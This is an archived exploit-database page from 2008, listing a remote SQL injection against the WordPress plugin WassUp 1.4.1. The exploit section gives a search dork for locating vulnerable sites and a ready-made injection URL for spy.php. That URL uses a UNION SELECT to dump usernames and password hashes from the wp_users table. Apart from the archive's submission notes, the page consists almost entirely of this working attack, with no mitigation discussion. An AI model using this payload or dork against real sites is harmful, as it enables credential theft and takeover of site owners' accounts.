|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | Wordpress Plugin WassUp 1.4.1 Remote SQL Injection Vulnerability
|
ExploitAlert : 3294
Credit : S@BUN
Date : 31.01.2008
Download
Plain text version
 Exploit Code : #########################################################################
#
# WordPress SQL Injection(plugins/wassup)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
DorK 1 : allinurl: "plugins/wassup"
########################################################################
EXPLOIT :
www.xxxxxxx.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%2
0id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,
4,0x7c,6,0x7c,8,9,10%20%20from%20wp_users
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|